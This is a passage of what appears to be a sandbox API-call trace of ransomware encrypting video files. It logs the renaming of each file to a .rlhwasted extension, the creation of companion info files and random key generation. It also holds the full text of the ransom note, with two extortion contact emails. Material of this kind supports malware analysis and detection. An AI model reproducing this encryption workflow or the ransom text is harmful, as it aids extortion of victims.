lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.141] SetEndOfFile (hFile=0x108) returned 1 [0198.141] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.141] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.142] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gGPm6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ggpm6.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gGPm6.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ggpm6.mp4.rlhwasted")) returned 1 [0198.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gGPm6.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ggpm6.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.143] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.143] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xdb32 [0198.143] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdb32) returned 0x6a0000 [0198.143] CloseHandle (hObject=0x10c) returned 1 [0198.194] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.195] CloseHandle (hObject=0x128) returned 1 [0198.195] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.195] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0198.196] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.196] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.196] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0198.197] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.197] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.209] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.209] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eYyZpiaZSIiMSqZAk3l0Q2RUotWVS9xzHJpcaa2TzX3T8lW+VrNAdZ4UuTQ73COE\r\nwwCJ5P2dzO1zrtuxFsXzFzzuSITCLbpkBl8GEpwKuwRCedcrv6uP5Lhg84RRmI2H\r\np9CiJknsxUSBt2ijTQIlzmt1M1A9XZTO9UVaAyhHkBIpX7h9igxKHWU/dZNKJTKc\r\nwfNYnGOnlvUMJ/116CChuZaOWacgPNfhVkKUABqnI1OHdg4QlI0y8FFfzTfOa1BU\r\nneTz7AN9VrRs1i2dKlqFzgJdgwohIpGLYbwG12IfJSwxSJZA3BI8Y2bQamxkxyfn\r\nnTiHZQ21Jw8QYteuy4ycbMZpahPdv8+4t45tIDdV7r736kqVlUHHvp63RrhtW2sc\r\nyjUupNFyIhN5PMKIfSwNMg3K2s8yTjLp9PS8FNwe56cLepBrGTiz5hChUVyQA0zR\r\na7y9hwViwuRMuxwtLozWfr0WZeAX014VovJBHMNTQqyMi9/Z8PXcQnPiRV+N2QLA\r\nIM4mzfriGoVU/Sp164oQMb459FCCbRrQklF8MsNbAQc/yJV0LXyc0cbRtiKr2aot\r\n7tSnGOkJromje39uZ3zXsMA/TbRnrU/GJcgNu4lKpQiEA+cIOuIN0Xe4LBnZFVEI\r\nfpGfTj4bRCYW27uYy3IoTFXgCryqJcdoTGXwdOLtm0b=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.209] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.209] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.209] SetEndOfFile (hFile=0x108) returned 1 [0198.212] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.212] CloseHandle (hObject=0x108) returned 1 [0198.214] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.214] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704e50 | out: hHeap=0x6b0000) returned 1 [0198.215] _aulldvrm () returned 0x0 [0198.215] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0198.216] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.216] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\invtH98TuXskfAmp3BYU.mp4") returned 102 [0198.216] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d6) returned 0x6e7988 [0198.216] lstrcpyW (in: lpString1=0x6e7a54, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.216] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.216] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0198.217] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.217] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\invtH98TuXskfAmp3BYU.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\invth98tuxskfamp3byu.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.221] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.223] SetEndOfFile (hFile=0x108) returned 1 [0198.223] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.223] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.223] lstrcpyW (in: lpString1=0x6e7a54, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\invtH98TuXskfAmp3BYU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\invth98tuxskfamp3byu.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\invtH98TuXskfAmp3BYU.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\invth98tuxskfamp3byu.mp4.rlhwasted")) returned 1 [0198.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\invtH98TuXskfAmp3BYU.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\invth98tuxskfamp3byu.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.225] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.225] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xf77b [0198.225] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf77b) returned 0x6a0000 [0198.225] CloseHandle (hObject=0x128) returned 1 [0198.230] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.231] CloseHandle (hObject=0x10c) returned 1 [0198.231] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x704d00 [0198.231] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.232] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704d48 | out: pbBuffer=0x704d48) returned 1 [0198.232] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.232] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.233] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.233] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.291] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0198.291] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704d00 | out: hHeap=0x6b0000) returned 1 [0198.291] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.291] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kFzYGN510CfsItmKdIKbM7zOptezPWONE1wl83VH6L8OlNClMHa4S24AMrF1dBxp\r\nmSEERN40v5AELy3tuQZ/W5rPSdG4RaPvxuuMtUJIC9X/jVaRqtQeSTOBBcdXe/Ej\r\n2w2oBNTgdR+gkT2qDrMaI6d93nnHRYQnw/S7Hh1Dw+fGXJwmoQRxMnC30EmqO+z6\r\nMPwQiD0tV7ZxWiurmC1hdA5IMD7rUqxb9osykoKsDFwN3Bm0FTVl0jWW88CXM5aN\r\namnyzdZ1s7wJBxqEc5XRMumC/zaAm9awHaemeOR5ID+UnRToLRwy/ZTlusKHy3mZ\r\nJ8EpgeZfhMaSmKjw4JFw85Y6q2m3pAjs+9h71SbBD8qmU3cau2/bYDuBRDmBQKr+\r\nMBhvdAXT+SXmv1NqnnkoFIPtUXHy0BhHnFWLsNmXSu6IEKvxRIStAOzi+rKc0Y38\r\ngd+eagWHMJkPRG2ecZeUFOWsGNMwIYra6mfwnS6rBSPfb5shc1/Cpwn4srKzn0J8\r\nlVInUO39RNFUY6teWR9EzKKWp7wcHF79f9qLY9KEbUBeCFAcg2ejWZxN8aEW3XZP\r\nOvEh00tyPNbyG7k4y9Bg42jQqDtL3SpzBdIrEQN9st9ILiwhwpDmct4ilx48WbMQ\r\na5EN7zuc5QfKUvbILEnQqvYmGE6ftOyRTzqJOcc22Zw=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.291] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0198.291] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.292] SetEndOfFile (hFile=0x108) returned 1 [0198.295] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.295] CloseHandle (hObject=0x108) returned 1 [0198.297] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.297] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704bd8 | out: hHeap=0x6b0000) returned 1 [0198.298] _aulldvrm () returned 0x0 [0198.298] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.299] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.299] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\mWiSfX.flv") returned 67 [0198.299] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x290) returned 0x707f58 [0198.299] lstrcpyW (in: lpString1=0x707fde, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.299] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.299] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.300] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.300] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\mWiSfX.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\mwisfx.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.301] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.302] SetEndOfFile (hFile=0x108) returned 1 [0198.302] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.303] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.303] lstrcpyW (in: lpString1=0x707fde, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\mWiSfX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\mwisfx.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\mWiSfX.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\mwisfx.flv.rlhwasted")) returned 1 [0198.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\mWiSfX.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\mwisfx.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.304] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0198.304] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1747f [0198.304] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1747f) returned 0x12b0000 [0198.304] CloseHandle (hObject=0x128) returned 1 [0198.311] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0198.311] CloseHandle (hObject=0x124) returned 1 [0198.311] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.311] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.313] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.313] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.313] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.314] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.314] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.325] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ARPHQYM7rGxIUAGzP7ZW9Iwwjm9w5RTO7U39lKpxdhhJs5hTZoj9tsOv+UH1Sw73\r\n7W3n+H7nUpApFGCxChB6Us56uGNeaGBS+coKMeZJezQZZitNog9ByadsCVM60SC0\r\nYbqPYpPz4huQ5fwIGDMW+NHU6qJtv/6kSeJao0lIAxeOpwVaolcGdacAf4hsh0Zt\r\n++VSOViR0wLwM4OII5r35w0Tw4RuxZlRhSi6rwWqMEMfVbwSwvquaB8jo1xTMGEQ\r\nmCcd/caSP7+EsCp1xYMUgpNHqjUtJfn/KB4tHl0rafkvIbWsU8ze/h7BrJEQfjyj\r\nlaUxZ3TP0m7Ll75Q1a3gSLeOo5LlJLxVGxefVQdJzyMSRuvmaPLBm0yrz8vHsqI+\r\nQIicNSbp+7FZgiktjo/JV8/P6ll9YHdggnvn3cBvhRSq21cSmTRYNXXU/gEizXWa\r\n2uXJdjB3ECdl97R17sw/6D+WRXFVS3cJXi1+FgsMvoAdK32i/1YVi3wiD/LUzAsA\r\npFs7fqWG5SDaUhp2WGnSWEn4wzYGJUsrKOw7dMQM5n2vjgAPaHi4HW9rIadFqXlt\r\nSXWLuH1+pMXpYpw8pfCH5U7CLjNXPH78lzHFTzwbtvHL+q7q/EArHQh4e/hktrR4\r\n+buvabe1G1rI3hxxmVxcHph6SqF23ghrTGAEvIsyTVc=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.325] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.325] SetEndOfFile (hFile=0x108) returned 1 [0198.328] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.328] CloseHandle (hObject=0x108) returned 1 [0198.330] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.330] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f23f0 | out: hHeap=0x6b0000) returned 1 [0198.331] _aulldvrm () returned 0x0 [0198.331] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.332] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.332] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.332] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\R_C_sqV7puslot9IOn.swf") returned 79 [0198.332] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6d4580 [0198.332] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.332] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.380] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.381] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.381] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\R_C_sqV7puslot9IOn.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\r_c_sqv7puslot9ion.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.382] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.383] SetEndOfFile (hFile=0x108) returned 1 [0198.383] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.383] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.383] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\R_C_sqV7puslot9IOn.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\r_c_sqv7puslot9ion.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\R_C_sqV7puslot9IOn.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js 